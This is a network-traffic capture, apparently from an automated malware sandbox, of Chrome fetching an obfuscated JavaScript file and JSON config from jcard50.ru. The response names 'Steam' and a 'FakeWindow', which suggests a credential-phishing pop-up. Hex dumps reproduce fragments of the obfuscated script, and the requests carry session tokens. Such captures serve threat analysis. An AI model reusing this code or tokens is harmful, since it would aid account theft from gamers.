                2025-01-13 00:00:44 UTC1369INData Raw: 8c 08 68 2a 92 5a 4e 66 50 2d 51 fb a6 20 55 c3 ea 21 74 1c 6b e8 24 b6 91 82 8f 8b c7 90 8a 4f 08 b0 ad 6a a7 25 a5 ae 62 79 30 dd 4d 6f b2 f8 eb d7 d9 bc 37 b1 ce 1c c6 de 92 b2 8e d2 32 30 45 cd 35 e2 07 3b ea dd c8 0d ff 60 6c db cf 22 77 be e5 ca b6 05 4b 18 7b 13 eb 3a 1f 3e 7d 68 9f 05 5d bd bd c5 0a 3f f7 cc ca 28 32 ba 67 4c b2 cf 5e 69 67 2f f1 e3 5f 91 dd 9c bb d0 de 31 7e f5 ea d5 f1 d2 f0 f0 f0 ec c6 aa e0 ae d7 07 6d 69 6c 6a 6d 3a 7f a8 c1 a8 7f 9e dc c9 66 05 66 c6 f5 a1 74 43 7d a8 17 40 0f f2 fe e2 78 92 1f 24 29 94 aa f4 65 d5 fa 31 7f f4 73 66 1d bf d3 b4 3d c1 0d 3f b0 0f ed 82 25 8e c2 8e 70 a3 57 ed 96 f3 f1 eb f8 27 30 b2 74 f7 5a 5e 7f f4 8f 9e cd af 8f 52 cb df 23 2e a4 8f 11 c6 7c ed 25 48 d1 50 11 9e 63 b4 89 35 15 9b f6 e0 f4
                Data Ascii: h*ZNfP-Q U!tk$Oj%by0Mo720E5;`l"wK{:>}h]?(2gL^ig/_1~miljm:fftC}@x$)e1sf=?%pW'0tZ^R#.|%HPc5
                2025-01-13 00:00:44 UTC1369INData Raw: a0 2c 3e 8e b2 18 86 58 d7 a0 1b 99 fa 11 31 ef 0f 29 d4 0f 8d 4e 62 97 62 74 91 b4 ab 05 14 8e e0 b2 d9 4a 04 4b 62 19 d0 f3 12 5c 7a 6c a2 2a ec 54 05 ed 90 a0 89 3b 34 51 05 9c 43 5b 58 0a 50 9e 2b 9c 96 ce 76 64 6c 47 14 ca 14 26 b6 68 63 1a 58 78 1b 15 ac c8 48 76 7e 93 75 40 76 45 af b6 1a 65 c8 49 d9 93 bc cc 99 32 a7 e8 9c c2 1b 0a 2f 0f 77 01 18 5e 43 2e 42 3b 5a 92 c4 b4 ec d7 dd 8b 71 82 e1 fc e9 52 c7 a5 cb 97 71 d6 ed de 12 6e d7 cf 3c 4c e3 74 bc 18 7d bd 7b f2 fb ca fa 39 28 dc 5f a1 67 f3 ef 07 f6 0d 3d bf bd 6a 2f ce ef 0f 1e b0 f6 1f 34 f6 d9 3a 3d d3 b0 fc 72 f5 25 90 6e c3 03 fc de e3 d0 4d 73 86 a6 05 7e 1c a0 fc 12 e4 e8 e6 d7 35 03 69 c6 ab 90 ab d0 2d d4 64 9a a9 3a 0a c8 bc ea 14 5a 65 ac 1c 95 f9 87 4c f3 0d 33 cf 65 c1 5d 52 07
                Data Ascii: ,>X1)NbbtJKb\zl*T;4QC[XP+vdlG&hcXxHv~u@vEeI2/w^C.B;ZqRqn<Lt}{9(_g=j/4:=r%nMs~5i-d:ZeL3e]R
                2025-01-13 00:00:44 UTC1369INData Raw: eb e4 0e 10 b9 67 2b 0f 8a 04 35 f8 6d b7 2f bc 06 c4 e0 dd 85 d4 54 c7 10 c1 5b 64 ac e8 0a 92 35 19 2b 55 8a 88 11 c1 12 8e 5e b1 31 45 54 1c d7 39 35 03 75 04 96 6a d9 d3 7a 4c e7 94 93 15 be 5a 6e 03 5c dd 2d 63 98 39 5d 3b f2 a1 1c 96 f5 b9 24 92 0b 7e 91 45 4c 43 2a f7 7a e6 cc d0 4d cb 30 72 e1 31 b5 b2 96 c6 ad 94 9d bb c7 f8 f7 60 bd 1c f6 72 4c d4 4e 85 3c a5 c1 82 71 a1 f3 ea c2 ad 3f 79 b1 b8 71 78 71 f1 49 93 dc fb 68 7e 7e fd e0 bc cb 24 1d c7 e6 d5 f6 68 85 2c c9 05 91 73 4d 35 89 67 49 7d 4c df 8f a2 e7 53 34 58 fe ee c8 72 92 fc 9e 6a f7 a3 e8 d5 86 b1 57 34 b8 f1 32 81 e2 2e 19 22 98 60 8a a9 a3 aa f9 99 f5 16 64 39 ce 9d c5 ab 1c 49 c9 29 f0 1d 58 65 85 6f ab dd 0e 48 31 41 9e 78 6f 5a 72 4d cc 58 c8 1f 74 80 04 0e 93 74 30 82 45 26 b8
                Data Ascii: g+5m/T[d5+U^1ET95ujzLZn\-c9];$~ELC*zM0r1`rLN<q?yqxqIh~~$h,sM5gI}LS4XrjW42."`d9I)XeoH1AxoZrMXtt0E&
                2025-01-13 00:00:44 UTC1369INData Raw: 51 57 ef 85 df ff b7 ff df ba 94 d8 8f a3 ef 5b b1 b9 3d c6 97 02 2b 82 87 28 2c 61 6f 7c 78 96 f8 1f d8 ca b7 58 e1 a3 1f c7 8d ac 07 7b 8d 07 3b 47 68 21 18 6a d8 5f 67 72 b3 c6 ca ca b6 b6 f6 03 0e a8 ed a7 65 53 a9 12 c0 1a da 13 59 b2 35 06 90 36 53 2c 5d 30 77 a2 2c e6 83 98 e4 02 73 11 ea b7 8a 32 b2 ea f7 1f cf 20 f7 e6 a3 30 bc 47 7c 67 d2 08 b3 d8 1b 79 fa f0 e1 8d 46 cc 59 bc 29 d6 25 b8 70 ba d9 85 b4 e3 25 ea 10 44 41 96 14 46 2a a8 8a 48 d8 a2 17 c5 48 86 c1 f4 21 ac 59 5b c0 7f af de 72 8f e4 32 4f b0 82 2c 9a 62 a8 37 5c c3 4f 9c 5d a0 88 4c 96 b4 63 cc 22 ed 1d a5 ab 48 ce b4 b5 60 a5 83 18 86 57 b2 f2 e9 c2 49 55 d0 c4 c8 1c c6 ad a4 c4 2e 1d 15 d1 60 06 1a 1e 85 a8 3e f6 26 46 e6 28 35 3c 17 67 bc 97 54 bb 02 0b fb bd c6 0c b9 43 94 1a
                Data Ascii: QW[=+(,ao|xX{;Gh!j_greSY56S,]0w,s2 0G|gyFY)%p%DAF*HH!Y[r2O,b7\O]Lc"H`WIU.`>&F(5<gTC
                2025-01-13 00:00:44 UTC1369INData Raw: ce 97 b2 67 c3 2f 45 05 e8 00 db f6 a7 39 2f e0 ad 61 16 f1 5f a0 4e e2 2e 17 6e bd 1d 39 52 ac 9f c1 cb 28 56 c0 32 d5 78 6f 99 16 82 57 5f 0f 21 8b d6 bb 0f 70 0a df fc fa c4 a8 e5 14 a7 f0 e5 db 12 19 16 3e 85 68 50 6f c0 cc cf de 52 38 81 dc 4e 87 e8 88 e5 b7 c0 3d af 5d 7e db 22 27 c3 51 9f cf 9e 9b 92 bd 15 f4 2d a6 be cd 54 b6 6d 01 6b 85 8b b4 a2 3c ac 98 69 e3 b7 85 4f e9 4c a9 d0 b1 1e 11 04 ee e8 e0 cd 35 37 c3 df 84 9f a2 99 e9 e8 33 e3 c7 0c a9 db da be 31 e4 ce af e9 a5 5e 67 cd 8f c2 50 2f 66 14 bb 9f 47 8f 1b a2 14 13 3f ee 0b 58 31 4a d3 74 5e f6 bd 8e e1 f1 f3 d8 9b 98 98 5b 37 d7 7c d0 ef 3b 07 1a 37 27 89 d5 ff a0 e9 18 b7 39 1d ff a4 7f 76 78 24 dc 23 73 eb 6e 24 9b 1b 0f 74 ac cd 37 92 cd 8d cc fe 49 22 50 55 98 f0 e3 bc 25 fa db fb
                Data Ascii: g/E9/a_N.n9R(V2xoW_!p>hPoR8N=]~"'Q-Tmk<iOL5731^gP/fG?X1Jt^[7|;7'9vx$#sn$t7I"PU%


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                5192.168.2.549730104.21.112.1443748C:\Program Files\Google\Chrome\Application\chrome.exe
                TimestampBytes transferredDirectionData
                2025-01-13 00:00:44 UTC883OUTGET /704a2a507555060f0d535d1a.js HTTP/1.1
                Host: jcard50.ru
                Connection: keep-alive
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                Accept: */*
                Sec-Fetch-Site: none
                Sec-Fetch-Mode: cors
                Sec-Fetch-Dest: empty
                Accept-Encoding: gzip, deflate, br
                Accept-Language: en-US,en;q=0.9
                Cookie: session=eyJhbGciOiJBMTI4S1ciLCJlbmMiOiJBMTI4R0NNIn0.TlDUUQDijjfjQz2lJu1YQt2_fLToQS8c.wUtwJT6gR5YZAIon.crxuLFHMNFFmpc2ccH-E9JHvQ-TAyM37N959zvnw0WhmkERX-L4QWyiHsDEa_Klm_O_sbUDQK0WUYsZPbR2kobKXxJebQc-bTpvlF5Ht8OuGcEOnvjlUSS5o8QRXAInTGyce8PvafR_upXqYsRCebt-2mnn_SYMyzfyzXChO1vBJPXzQERxIrV-vnV9_1ywCYCf26HsFDLZYdYk_-Witow.oNE33_itdKf7PRHc1TQdNw; token=eyJhbGciOiJIUzI1NiJ9.eyJvd25lciI6MjAzLCJzZWNyZXQiOiI0M2QxOGRlZmM3OGJmNzkyZDFhZDE1MmI5ZTIyYWE4MSIsInNlcnZpY2UiOiJTdGVhbSJ9.yfSWhV4PrhDFs7l2gG5wsFg9StiBx__TJdgJ59eWysk
                2025-01-13 00:00:44 UTC1295INHTTP/1.1 200 OK
                Date: Mon, 13 Jan 2025 00:00:44 GMT
                Content-Type: application/javascript
                Transfer-Encoding: chunked
                Connection: close
                Content-Disposition: inline
                Cross-Origin-Opener-Policy: same-origin
                Cross-Origin-Resource-Policy: same-origin
                Last-Modified: Fri, 10 Jan 2025 14:35:22 GMT
                Origin-Agent-Cluster: ?1
                Referrer-Policy: no-referrer
                Strict-Transport-Security: max-age=15552000; includeSubDomains
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                X-Dns-Prefetch-Control: off
                X-Download-Options: noopen
                X-Frame-Options: SAMEORIGIN
                X-Permitted-Cross-Domain-Policies: none
                X-Xss-Protection: 0
                Cache-Control: max-age=14400
                CF-Cache-Status: HIT
                Age: 1
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KKFDf41y9u%2BlGq7lqg4R0R6go0SX7JejGsr7bZXnnpoA2%2F3ujq2D65ip51nNNm7dJ7Gv4LcgbmK1CVj5tXn756e5V4eaH5bzyxjOvzSYt%2Brw5EV2DUG51GZtph%2Bf"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 90111b982f6043b3-EWR
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=1585&min_rtt=1584&rtt_var=597&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=1461&delivery_rate=1827284&cwnd=203&unsent_bytes=0&cid=57b2cf5f7f43a5f5&ts=147&x=0"
                2025-01-13 00:00:44 UTC74INData Raw: 37 62 36 38 0d 0a 66 75 6e 63 74 69 6f 6e 20 5f 30 78 35 35 64 39 28 5f 30 78 31 33 39 39 38 64 2c 5f 30 78 36 63 65 38 32 66 29 7b 63 6f 6e 73 74 20 5f 30 78 33 65 63 32 37 34 3d 5f 30 78 33 65 63 32 28 29 3b 72 65 74 75
                Data Ascii: 7b68function _0x55d9(_0x13998d,_0x6ce82f){const _0x3ec274=_0x3ec2();retu
                2025-01-13 00:00:44 UTC1369INData Raw: 72 6e 20 5f 30 78 35 35 64 39 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 35 64 39 64 35 2c 5f 30 78 31 66 38 65 31 32 29 7b 5f 30 78 35 35 64 39 64 35 3d 5f 30 78 35 35 64 39 64 35 2d 30 78 31 34 61 3b 6c 65 74 20 5f 30 78 31 34 38 35 39 65 3d 5f 30 78 33 65 63 32 37 34 5b 5f 30 78 35 35 64 39 64 35 5d 3b 72 65 74 75 72 6e 20 5f 30 78 31 34 38 35 39 65 3b 7d 2c 5f 30 78 35 35 64 39 28 5f 30 78 31 33 39 39 38 64 2c 5f 30 78 36 63 65 38 32 66 29 3b 7d 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 35 30 64 35 30 65 2c 5f 30 78 35 32 34 35 34 66 29 7b 63 6f 6e 73 74 20 5f 30 78 34 33 32 36 65 66 3d 5f 30 78 35 35 64 39 2c 5f 30 78 34 37 63 31 34 39 3d 5f 30 78 35 30 64 35 30 65 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 34 32
                Data Ascii: rn _0x55d9=function(_0x55d9d5,_0x1f8e12){_0x55d9d5=_0x55d9d5-0x14a;let _0x14859e=_0x3ec274[_0x55d9d5];return _0x14859e;},_0x55d9(_0x13998d,_0x6ce82f);}(function(_0x50d50e,_0x52454f){const _0x4326ef=_0x55d9,_0x47c149=_0x50d50e();while(!![]){try{const _0x42
                2025-01-13 00:00:44 UTC1369INData Raw: 31 31 38 39 66 2c 5f 30 78 37 39 36 39 65 39 29 3d 3e 7b 63 6f 6e 73 74 20 5f 30 78 31 61 61 34 63 31 3d 5f 30 78 32 32 62 36 66 35 3b 66 6f 72 28 76 61 72 20 5f 30 78 34 35 32 66 31 31 20 69 6e 20 5f 30 78 37 39 36 39 65 39 7c 7c 28 5f 30 78 37 39 36 39 65 39 3d 7b 7d 29 29 5f 30 78 32 62 64 34 37 38 5b 27 63 61 6c 6c 27 5d 28 5f 30 78 37 39 36 39 65 39 2c 5f 30 78 34 35 32 66 31 31 29 26 26 5f 30 78 34 39 65 66 63 38 28 5f 30 78 34 31 31 38 39 66 2c 5f 30 78 34 35 32 66 31 31 2c 5f 30 78 37 39 36 39 65 39 5b 5f 30 78 34 35 32 66 31 31 5d 29 3b 69 66 28 5f 30 78 35 38 63 32 66 31 29 7b 66 6f 72 28 76 61 72 20 5f 30 78 34 35 32 66 31 31 20 6f 66 20 5f 30 78 35 38 63 32 66 31 28 5f 30 78 37 39 36 39 65 39 29 29 5f 30 78 32 30 65 32 65 36 5b 5f 30 78 31 61
                Data Ascii: 1189f,_0x7969e9)=>{const _0x1aa4c1=_0x22b6f5;for(var _0x452f11 in _0x7969e9||(_0x7969e9={}))_0x2bd478['call'](_0x7969e9,_0x452f11)&&_0x49efc8(_0x41189f,_0x452f11,_0x7969e9[_0x452f11]);if(_0x58c2f1){for(var _0x452f11 of _0x58c2f1(_0x7969e9))_0x20e2e6[_0x1a
                2025-01-13 00:00:44 UTC1369INData Raw: 65 33 5b 5f 30 78 34 65 66 39 36 32 28 30 78 31 61 36 29 5d 3d 5f 30 78 34 32 32 33 31 33 28 29 3a 5f 30 78 31 30 37 63 30 36 5b 27 67 65 74 53 69 7a 65 27 5d 3d 5f 30 78 34 32 32 33 31 33 28 29 3b 7d 28 77 69 6e 64 6f 77 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 33 61 31 64 61 33 3d 5f 30 78 35 35 64 39 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 31 39 63 63 39 39 28 5f 30 78 61 62 30 34 39 37 29 7b 63 6f 6e 73 74 20 5f 30 78 35 64 32 64 62 61 3d 5f 30 78 35 35 64 39 3b 6c 65 74 20 5f 30 78 32 33 62 61 65 38 3d 70 61 72 73 65 46 6c 6f 61 74 28 5f 30 78 61 62 30 34 39 37 29 3b 72 65 74 75 72 6e 20 5f 30 78 61 62 30 34 39 37 5b 5f 30 78 35 64 32 64 62 61 28 30 78 32 37 33 29 5d 28 27 25 27 29 3d 3d 2d 30 78 31 26 26 21 69 73 4e 61 4e 28 5f
                Data Ascii: e3[_0x4ef962(0x1a6)]=_0x422313():_0x107c06['getSize']=_0x422313();}(window,function(){const _0x3a1da3=_0x55d9;function _0x19cc99(_0xab0497){const _0x5d2dba=_0x55d9;let _0x23bae8=parseFloat(_0xab0497);return _0xab0497[_0x5d2dba(0x273)]('%')==-0x1&&!isNaN(_
                2025-01-13 00:00:44 UTC1369INData Raw: 3d 70 61 72 73 65 46 6c 6f 61 74 28 5f 30 78 35 63 33 63 63 66 29 3b 5f 30 78 61 66 32 32 66 62 5b 5f 30 78 34 63 32 63 33 37 5d 3d 69 73 4e 61 4e 28 5f 30 78 33 34 33 64 66 39 29 3f 30 78 30 3a 5f 30 78 33 34 33 64 66 39 3b 7d 29 3b 6c 65 74 20 5f 30 78 34 32 37 66 66 32 3d 5f 30 78 61 66 32 32 66 62 5b 5f 30 78 66 32 63 66 32 31 28 30 78 31 61 61 29 5d 2b 5f 30 78 61 66 32 32 66 62 5b 5f 30 78 66 32 63 66 32 31 28 30 78 32 32 33 29 5d 2c 5f 30 78 32 38 31 36 37 66 3d 5f 30 78 61 66 32 32 66 62 5b 5f 30 78 66 32 63 66 32 31 28 30 78 31 64 37 29 5d 2b 5f 30 78 61 66 32 32 66 62 5b 5f 30 78 66 32 63 66 32 31 28 30 78 31 36 32 29 5d 2c 5f 30 78 35 62 64 36 37 39 3d 5f 30 78 61 66 32 32 66 62 5b 5f 30 78 66 32 63 66 32 31 28 30 78 32 32 31 29 5d 2b 5f 30 78
                Data Ascii: =parseFloat(_0x5c3ccf);_0xaf22fb[_0x4c2c37]=isNaN(_0x343df9)?0x0:_0x343df9;});let _0x427ff2=_0xaf22fb[_0xf2cf21(0x1aa)]+_0xaf22fb[_0xf2cf21(0x223)],_0x28167f=_0xaf22fb[_0xf2cf21(0x1d7)]+_0xaf22fb[_0xf2cf21(0x162)],_0x5bd679=_0xaf22fb[_0xf2cf21(0x221)]+_0x
                2025-01-13 00:00:44 UTC1369INData Raw: 5f 30 78 35 35 64 39 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 36 66 61 62 38 30 28 29 7b 7d 6c 65 74 20 5f 30 78 34 35 39 34 35 66 3d 5f 30 78 36 66 61 62 38 30 5b 5f 30 78 31 36 62 33 62 39 28 30 78 31 37 62 29 5d 3b 72 65 74 75 72 6e 20 5f 30 78 34 35 39 34 35 66 5b 27 6f 6e 27 5d 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 65 64 38 34 32 63 2c 5f 30 78 35 30 31 32 38 33 29 7b 63 6f 6e 73 74 20 5f 30 78 34 31 64 38 30 61 3d 5f 30 78 31 36 62 33 62 39 3b 69 66 28 21 5f 30 78 65 64 38 34 32 63 7c 7c 21 5f 30 78 35 30 31 32 38 33 29 72 65 74 75 72 6e 20 74 68 69 73 3b 6c 65 74 20 5f 30 78 33 65 61 61 63 30 3d 74 68 69 73 5b 5f 30 78 34 31 64 38 30 61 28 30 78 31 39 61 29 5d 3d 74 68 69 73 5b 27 5f 65 76 65 6e 74 73 27 5d 7c 7c 7b 7d 2c 5f 30 78 34 66 35 66 32 65
                Data Ascii: _0x55d9;function _0x6fab80(){}let _0x45945f=_0x6fab80[_0x16b3b9(0x17b)];return _0x45945f['on']=function(_0xed842c,_0x501283){const _0x41d80a=_0x16b3b9;if(!_0xed842c||!_0x501283)return this;let _0x3eaac0=this[_0x41d80a(0x19a)]=this['_events']||{},_0x4f5f2e
                2025-01-13 00:00:44 UTC1369INData Raw: 74 20 5f 30 78 33 33 35 66 38 33 20 6f 66 20 5f 30 78 63 65 36 34 62 31 29 5f 30 78 34 39 36 34 34 39 26 26 5f 30 78 34 39 36 34 34 39 5b 5f 30 78 33 33 35 66 38 33 5d 26 26 28 74 68 69 73 5b 5f 30 78 33 65 36 35 39 31 28 30 78 31 62 33 29 5d 28 5f 30 78 33 30 64 62 31 33 2c 5f 30 78 33 33 35 66 38 33 29 2c 64 65 6c 65 74 65 20 5f 30 78 34 39 36 34 34 39 5b 5f 30 78 33 33 35 66 38 33 5d 29 2c 5f 30 78 33 33 35 66 38 33 5b 5f 30 78 33 65 36 35 39 31 28 30 78 31 39 31 29 5d 28 74 68 69 73 2c 5f 30 78 39 38 64 32 36 65 29 3b 72 65 74 75 72 6e 20 74 68 69 73 3b 7d 2c 5f 30 78 34 35 39 34 35 66 5b 5f 30 78 31 36 62 33 62 39 28 30 78 32 32 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 34 33 61 66 33 62 3d 5f 30 78 31 36 62 33 62 39 3b
                Data Ascii: t _0x335f83 of _0xce64b1)_0x496449&&_0x496449[_0x335f83]&&(this[_0x3e6591(0x1b3)](_0x30db13,_0x335f83),delete _0x496449[_0x335f83]),_0x335f83[_0x3e6591(0x191)](this,_0x98d26e);return this;},_0x45945f[_0x16b3b9(0x226)]=function(){const _0x43af3b=_0x16b3b9;
                2025-01-13 00:00:44 UTC1369INData Raw: 62 32 28 30 78 31 63 31 29 2c 5f 30 78 34 65 65 65 62 62 5b 27 62 69 6e 64 48 61 6e 64 6c 65 73 27 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 31 37 36 38 61 38 3d 5f 30 78 35 38 34 32 62 32 3b 74 68 69 73 5b 5f 30 78 31 37 36 38 61 38 28 30 78 32 33 37 29 5d 28 5f 30 78 31 37 36 38 61 38 28 30 78 31 37 31 29 2c 74 68 69 73 5b 5f 30 78 31 37 36 38 61 38 28 30 78 31 38 30 29 5d 29 3b 7d 2c 5f 30 78 34 65 65 65 62 62 5b 5f 30 78 35 38 34 32 62 32 28 30 78 32 35 62 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 64 34 37 30 62 38 3d 5f 30 78 35 38 34 32 62 32 3b 74 68 69 73 5b 5f 30 78 64 34 37 30 62 38 28 30 78 32 33 37 29 5d 28 27 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 27 2c 27 27 29 3b 7d 2c 5f
                Data Ascii: b2(0x1c1),_0x4eeebb['bindHandles']=function(){const _0x1768a8=_0x5842b2;this[_0x1768a8(0x237)](_0x1768a8(0x171),this[_0x1768a8(0x180)]);},_0x4eeebb[_0x5842b2(0x25b)]=function(){const _0xd470b8=_0x5842b2;this[_0xd470b8(0x237)]('removeEventListener','');},_
                2025-01-13 00:00:44 UTC1369INData Raw: 5d 28 5f 30 78 37 36 33 37 33 63 2c 5f 30 78 31 30 31 32 32 30 29 3b 7d 2c 5f 30 78 34 65 65 65 62 62 5b 5f 30 78 35 38 34 32 62 32 28 30 78 32 35 63 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 31 63 62 39 37 29 7b 74 68 69 73 5b 27 70 6f 69 6e 74 65 72 44 6f 77 6e 27 5d 28 5f 30 78 32 31 63 62 39 37 2c 5f 30 78 32 31 63 62 39 37 29 3b 7d 2c 5f 30 78 34 65 65 65 62 62 5b 5f 30 78 35 38 34 32 62 32 28 30 78 31 65 38 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 30 64 33 66 65 29 7b 63 6f 6e 73 74 20 5f 30 78 35 65 32 65 32 37 3d 5f 30 78 35 38 34 32 62 32 3b 74 68 69 73 5b 27 70 6f 69 6e 74 65 72 44 6f 77 6e 27 5d 28 5f 30 78 32 30 64 33 66 65 2c 5f 30 78 32 30 64 33 66 65 5b 5f 30 78 35 65 32 65 32 37 28 30 78 31 38 36 29 5d 5b 30 78 30 5d 29 3b 7d
                Data Ascii: ](_0x76373c,_0x101220);},_0x4eeebb[_0x5842b2(0x25c)]=function(_0x21cb97){this['pointerDown'](_0x21cb97,_0x21cb97);},_0x4eeebb[_0x5842b2(0x1e8)]=function(_0x20d3fe){const _0x5e2e27=_0x5842b2;this['pointerDown'](_0x20d3fe,_0x20d3fe[_0x5e2e27(0x186)][0x0]);}
                2025-01-13 00:00:44 UTC1369INData Raw: 30 78 31 38 64 29 5d 28 5f 30 78 33 31 64 35 62 33 28 30 78 31 38 38 29 2c 5f 30 78 33 32 32 61 65 38 29 3b 7d 2c 5f 30 78 34 65 65 65 62 62 5b 5f 30 78 35 38 34 32 62 32 28 30 78 31 39 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 62 35 65 38 35 29 7b 63 6f 6e 73 74 20 5f 30 78 33 38 31 61 36 63 3d 5f 30 78 35 38 34 32 62 32 3b 74 68 69 73 5b 5f 30 78 33 38 31 61 36 63 28 30 78 32 31 33 29 5d 28 27 70 6f 69 6e 74 65 72 4d 6f 76 65 27 2c 5f 30 78 31 62 35 65 38 35 29 3b 7d 2c 5f 30 78 34 65 65 65 62 62 5b 27 70 6f 69 6e 74 65 72 4d 6f 76 65 27 5d 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 32 63 61 66 32 2c 5f 30 78 34 36 34 35 66 36 29 7b 63 6f 6e 73 74 20 5f 30 78 32 35 61 37 32 63 3d 5f 30 78 35 38 34 32 62 32 3b 6c 65 74 20 5f 30 78 34 35 30 32 34
                Data Ascii: 0x18d)](_0x31d5b3(0x188),_0x322ae8);},_0x4eeebb[_0x5842b2(0x197)]=function(_0x1b5e85){const _0x381a6c=_0x5842b2;this[_0x381a6c(0x213)]('pointerMove',_0x1b5e85);},_0x4eeebb['pointerMove']=function(_0x32caf2,_0x4645f6){const _0x25a72c=_0x5842b2;let _0x45024


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                6192.168.2.549732104.21.112.1443748C:\Program Files\Google\Chrome\Application\chrome.exe
                TimestampBytes transferredDirectionData
                2025-01-13 00:00:45 UTC896OUTGET /704a2a507555060106436b0b12527a5d0a570803 HTTP/1.1
                Host: jcard50.ru
                Connection: keep-alive
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                Accept: */*
                Sec-Fetch-Site: none
                Sec-Fetch-Mode: cors
                Sec-Fetch-Dest: empty
                Accept-Encoding: gzip, deflate, br
                Accept-Language: en-US,en;q=0.9
                Cookie: session=eyJhbGciOiJBMTI4S1ciLCJlbmMiOiJBMTI4R0NNIn0.TlDUUQDijjfjQz2lJu1YQt2_fLToQS8c.wUtwJT6gR5YZAIon.crxuLFHMNFFmpc2ccH-E9JHvQ-TAyM37N959zvnw0WhmkERX-L4QWyiHsDEa_Klm_O_sbUDQK0WUYsZPbR2kobKXxJebQc-bTpvlF5Ht8OuGcEOnvjlUSS5o8QRXAInTGyce8PvafR_upXqYsRCebt-2mnn_SYMyzfyzXChO1vBJPXzQERxIrV-vnV9_1ywCYCf26HsFDLZYdYk_-Witow.oNE33_itdKf7PRHc1TQdNw; token=eyJhbGciOiJIUzI1NiJ9.eyJvd25lciI6MjAzLCJzZWNyZXQiOiI0M2QxOGRlZmM3OGJmNzkyZDFhZDE1MmI5ZTIyYWE4MSIsInNlcnZpY2UiOiJTdGVhbSJ9.yfSWhV4PrhDFs7l2gG5wsFg9StiBx__TJdgJ59eWysk
                2025-01-13 00:00:45 UTC1236INHTTP/1.1 200 OK
                Date: Mon, 13 Jan 2025 00:00:45 GMT
                Content-Type: application/json; charset=utf-8
                Transfer-Encoding: chunked
                Connection: close
                Cross-Origin-Opener-Policy: same-origin
                Cross-Origin-Resource-Policy: same-origin
                Etag: W/"120-Drm4k2Q6Hkzhjpq9W1wZkK7VI3s"
                Origin-Agent-Cluster: ?1
                Referrer-Policy: no-referrer
                Strict-Transport-Security: max-age=15552000; includeSubDomains
                Vary: Accept-Encoding
                X-Content-Type-Options: nosniff
                X-Dns-Prefetch-Control: off
                X-Download-Options: noopen
                X-Frame-Options: SAMEORIGIN
                X-Permitted-Cross-Domain-Policies: none
                X-Xss-Protection: 0
                cf-cache-status: DYNAMIC
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AhpsBZ8Xra%2FGUoyUo%2BdFWYNwHdIE443dxpA8s3HAzktWp94yErHcdAOSILgCSUA4yyd77M2iPSCGSZJzpVzRHmp8UkTSXkbHP2Nl%2FChm8pfUu8uN1PDWUZXU1aYc"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 90111b9dce570f5b-EWR
                alt-svc: h3=":443"; ma=86400
                server-timing: cfL4;desc="?proto=TCP&rtt=1612&min_rtt=1602&rtt_var=621&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=1474&delivery_rate=1731909&cwnd=221&unsent_bytes=0&cid=e380895012a3e91c&ts=558&x=0"
                2025-01-13 00:00:45 UTC133INData Raw: 31 32 30 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 74 72 75 65 2c 22 73 65 72 76 69 63 65 22 3a 22 53 74 65 61 6d 22 2c 22 69 66 72 61 6d 65 22 3a 74 72 75 65 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 33 36 37 32 36 34 34 35 38 36 37 2e 32 35 33 37 2c 22 77 69 6e 64 6f 77 22 3a 7b 22 74 79 70 65 22 3a 22 46 61 6b 65 57 69 6e 64 6f 77 22 2c 22 74 69 74 6c 65 22 3a 22 53 74 65 61 6d 22 2c 22 75 72
                Data Ascii: 120{"success":true,"service":"Steam","iframe":true,"timestamp":1736726445867.2537,"window":{"type":"FakeWindow","title":"Steam","ur
